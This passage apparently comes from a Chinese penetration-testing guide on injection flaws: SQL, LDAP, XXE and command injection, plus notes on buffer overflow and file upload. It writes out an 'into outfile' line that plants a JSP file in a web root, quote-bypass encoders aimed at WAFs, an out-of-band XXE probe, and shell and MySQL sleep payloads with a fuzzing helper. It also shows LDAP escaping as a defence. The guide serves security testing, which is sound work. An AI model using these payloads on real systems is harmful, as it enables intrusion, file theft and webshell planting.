建议使用BurpSuite插件联动SQLmap,可以直接将数据包发送到SQLmap中跑一遍,很有效率。插件的名字叫做``。

另外就是二次注入是一个很容易被忽视的点,要结合具体的业务系统进行分析。

如果存在SQL注入漏洞,并且用户拥有写文件权限并且单引号不被转码,可以使用select * from table into outfile '/tmp/file'写文件。这种攻击可以作为一个额外技术,获取一个查询的结果信息或写入文件,可以在Web服务器的目录执行1 limit 1 into outfile '/var/www/root/test.jsp' FIELDS ENCLOSED BY '//' LINES TERMINATED BY '\n<%jsp code here%>';,这样就使用MySQL用户的权限创建了一个文件,里面包含以下内容

//field value//
<%jsp code here%>

load_file是一个用来读取本地文件的函数,如果用户拥有文件读权限的话,可以使用这个函数来读取文件。

对于单引号,MySQL中有标准的方式绕过。假如想获得Password字段的值password like 'A%',可以使用十六进制写法password like 0x4125,也可以写成password like char(65,37)
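
上面两种免引号写法可以机械地生成,下面是一个小工具函数的示意(假设输入为ASCII):

```python
def to_mysql_hex(s: str) -> str:
    """把字符串编码为MySQL十六进制字面量,例如 'A%' -> '0x4125'"""
    return "0x" + s.encode("ascii").hex().upper()

def to_mysql_char(s: str) -> str:
    """把字符串编码为MySQL的char()表达式,例如 'A%' -> 'char(65, 37)'"""
    return "char(" + ", ".join(str(b) for b in s.encode("ascii")) + ")"
```

当WAF或应用本身拦截/转义单引号但放行语句其余部分时,这两种编码很有用。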

LDAP测试

我在很早以前曾经复现过一次LDAP注入的漏洞CVE-2017-14596,当时是为了完成红日安全代码审计小组的任务,所以就没有发在博客上,现在很可惜原稿已经找不到了。LDAP是一个轻目录访问协议,Windows域内的认证方式就属于LDAP的一种。LDAP查询有自己的独特的一套语法,如果是刚接触渗透测试时间不久的同学可能还不太了解,我在这里简单介绍一下。

LDAP协议中会用到很多缩写

  • dn(Distinguished Name) 一条记录的位置,对比SQL来说就是一条查询语句,在LDAP中表示一个位置
  • dc(Domain Component) 一条记录所属的区域,域名部分
  • ou(Organization Unit) 一条记录所属的组织
  • cn(Common Name) 用户名或者服务器名

假如有一个Web应用程序使用了一个搜索过滤器

searchfilter="(cn=" + user +")"

从URL的角度看传参是这样的

http://domain.com/ldapsearchfilter?user=

如果我们在user后面不输入用户名,而是用一个*代替,在查询代码中就会变成

searchfilter="(cn=*)"

这样就变成了通配符,会显示全部用户或者部分用户的属性,这就要取决于应用程序的执行流了。

我本人测到的LDAP注入也仅仅只有两个,都是在进行用户身份认证的时候发现的,使用(、\、|、&、*等等字符可以测试出LDAP注入。我个人建议使用Burpsuite的Intruder功能,在SQL注入payload前面加上LDAP注入的测试字符,fuzz一下就可以测出结果。
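
上面的通配符问题,以及防止它的RFC 4515转义,可以用几行代码示意(过滤器的形式沿用上文的例子):

```python
def naive_search_filter(user: str) -> str:
    """上文例子中存在漏洞的字符串拼接"""
    return "(cn=" + user + ")"

def escape_ldap_value(value: str) -> str:
    """按RFC 4515转义LDAP过滤器元字符"""
    table = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}
    return "".join(table.get(ch, ch) for ch in value)
```

经过转义后,用户提交的*到达目录服务时变成字面序列\2a,不再充当通配符。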

XXE

XXE本身需要服务器解析XML文件,在测试的过程中经常看到返回包中的Content-Type字段中包含XML,但并不是只要包含了XML就能解析,这个需要手动的去测试一下,有时候经常在文件上传的位置发现XXE。

在测试XXE的时候最好找开发要一个处在同一个网段下的服务器来作为接收带外数据的服务器。因为绝大多数XXE是没有回显的,需要查看Web日志从而获取带外数据信息。开发网和外网是隔绝开的,用外网VPS是接不到带外数据的。
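
一个最小化的带外探测payload如下,其中监听地址是占位符,对应上文所说的同网段服务器:

```python
# 占位符:你控制的同网段监听服务器
COLLAB = "http://10.0.0.5:8000"

XXE_PROBE = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE root [\n"
    f'  <!ENTITY probe SYSTEM "{COLLAB}/xxe">\n'
    "]>\n"
    "<root>&probe;</root>"
)
```

在任何接受XML的入口提交这段payload;即使响应中没有任何回显,只要监听服务器的访问日志出现记录,就能确认解析器会解析外部实体。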

代码注入

有些Web功能页面允许用户在Web页面输入代码,并触发Web服务器执行该代码。在代码注入测试中,测试人员提交输入,然后Web服务器把这些输入作为动态代码或者包含文件接受处理。这里所指的代码注入包含了常说的命令注入,经常在Web后台发现。不仅仅是Web应用,有些主机设备的后台管理页面也频繁出现代码注入功能。与Web不同,主机设备的更多是对终端Shell的命令注入,因为主机设备往往不配备数据库,而是使用命令行进行身份认证或是代码执行。

Web应用上的代码执行更多的是要凭着敏锐的嗅觉找到有可能命令执行的点。这里我把Web应用分为两个大类,第一类就是大开源CMS,类似于ThinkPHP、WordPress、Laravel等等。这一类的开源CMS大多是经历过无数的安全专家进行代码审计以及漏洞挖掘,如果不是功底深厚很难挖掘到代码注入的问题。如果在工作中遇到此类的二次开源CMS,需要重点关注与原生CMS不同的新增功能,调用原生的过滤函数是否恰当,从黑盒的角度就是要去测试新增的与原始CMS不同的功能页面。第二类则是自己开发的Web应用,这些应用中存在代码注入的可能性远远大于第一类,从前端黑盒的角度去推理后端功能代码,找到可能存在代码注入的点进行测试。这种测试要多多寻找,因为你不知道开发的思路是多么的清奇(无贬义)。

测试代码注入的时候最有效率的方法我认为是连同SQL注入、LDAP注入一起进行Fuzz测试,加入一些例如sleep之类的命令,不得不说Fuzz测试总能带给人惊喜。
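
把sleep思路接到fuzz流程里的一种做法,是将每个payload的往返耗时与基线比较;send_request代表向目标发一次请求的任意函数,整体仅为示意:

```python
import time

# 几个经典的延时payload(shell与MySQL两类)
SLEEP_PAYLOADS = [
    "; sleep 3",
    "| sleep 3",
    "$(sleep 3)",
    "' AND sleep(3)-- -",
]

def _elapsed(send_request, payload: str) -> float:
    start = time.monotonic()
    send_request(payload)
    return time.monotonic() - start

def time_based_probe(send_request, payloads, delay: float = 3.0,
                     margin: float = 1.0) -> list:
    """返回耗时比基线多出约delay秒的payload列表"""
    baseline = _elapsed(send_request, "harmless-probe")
    return [p for p in payloads
            if _elapsed(send_request, p) - baseline >= delay - margin]
```

对响应慢或抖动大的目标,基线扣除很重要;可疑的命中应重复几次再下结论。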

缓冲区溢出

严格来说缓冲区溢出也算在注入类漏洞里面,但是我认为缓冲区溢出靠手工测试很难测出,也许是我能力不够才会有这样的想法。在现代SDLC中,黑盒测试之前是白盒代码审计,缓冲区溢出应当扼杀在代码审计的过程中。在黑盒测试的时候,通过扫描器也可以发现缓冲区溢出漏洞,DOS也是同理。

文件上传

文件上传漏洞从寻找的角度来说是非常容易寻找的,因为上传功能总会出现在那么几个固定位置上,头像上传,个人资料上传,数据表单上传等等。但是根据我的经验,我认为文件上传的定义应该再广一些。有些日志可以写入,这样如果日志文件路径暴露也会存在利用危险。还有些工程管理类型的应用也可以创建工单,如果工单存储为一个单独的文件也可以归类为文件上传。有些语言例如CSS,不需要一个完整的文件都符合CSS语法,只需要其中的一部分符合即可。